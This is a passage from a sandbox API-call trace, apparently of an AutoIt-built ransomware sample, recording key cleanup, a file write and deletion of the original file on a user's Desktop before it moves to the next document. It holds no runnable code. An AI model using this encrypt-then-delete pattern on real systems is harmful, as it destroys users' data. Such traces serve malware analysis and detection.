0x13 [0120.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.800] WriteFile (in: hFile=0x2a0, lpBuffer=0x49b37c8*, nNumberOfBytesToWrite=0x97b0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49b37c8*, lpNumberOfBytesWritten=0x144f194*=0x97b0, lpOverlapped=0x0) returned 1 [0120.802] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0120.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca898, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0120.803] CryptDestroyKey (hKey=0x41ac600) returned 1 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.803] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.804] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.804] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0120.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0120.804] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.805] FreeLibrary (hLibModule=0x756e0000) returned 1 [0120.805] CloseHandle (hObject=0x258) returned 1 [0120.805] CloseHandle (hObject=0x2a0) returned 1 [0120.807] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv", lpFilePart=0x0) returned 0x30 [0120.807] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ayyildyhoidalfth0-sh.csv")) returned 0x20 [0120.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0120.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0120.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0120.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0120.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0120.808] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4eb2670, ftCreationTime.dwHighDateTime=0x1d5e8af, ftLastAccessTime.dwLowDateTime=0x7e4b67d0, ftLastAccessTime.dwHighDateTime=0x1d5f018, ftLastWriteTime.dwLowDateTime=0x7e4b67d0, ftLastWriteTime.dwHighDateTime=0x1d5f018, nFileSizeHigh=0x0, nFileSizeLow=0x97a6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="aYyiLdyhoIdALfth0-Sh.csv", cAlternateFileName="AYYILD~1.CSV")) returned 0x41ac740 [0120.808] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ayyildyhoidalfth0-sh.csv")) returned 1 [0120.879] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4eb2670, ftCreationTime.dwHighDateTime=0x1d5e8af, ftLastAccessTime.dwLowDateTime=0x7e4b67d0, ftLastAccessTime.dwHighDateTime=0x1d5f018, ftLastWriteTime.dwLowDateTime=0x7e4b67d0, ftLastWriteTime.dwHighDateTime=0x1d5f018, nFileSizeHigh=0x0, nFileSizeLow=0x97a6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="aYyiLdyhoIdALfth0-Sh.csv", cAlternateFileName="AYYILD~1.CSV")) returned 0 [0120.879] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0120.879] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0120.879] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0120.880] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0120.880] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.880] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0120.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0120.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7b00 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.881] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0120.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0120.881] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0120.881] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.882] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58249d20, ftCreationTime.dwHighDateTime=0x1d5e324, ftLastAccessTime.dwLowDateTime=0xae133060, ftLastAccessTime.dwHighDateTime=0x1d5ea64, ftLastWriteTime.dwLowDateTime=0xae133060, ftLastWriteTime.dwHighDateTime=0x1d5ea64, nFileSizeHigh=0x0, nFileSizeLow=0xbc9f, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="aZ 2dgF6.ppt", cAlternateFileName="AZ2DGF~1.PPT")) returned 0x41ac200 [0120.882] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0120.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0120.882] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0120.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0120.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0120.882] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0120.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0120.883] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0120.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0120.883] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0120.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0120.883] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0120.883] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0120.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0120.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0120.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0120.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0120.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0120.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0120.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.885] 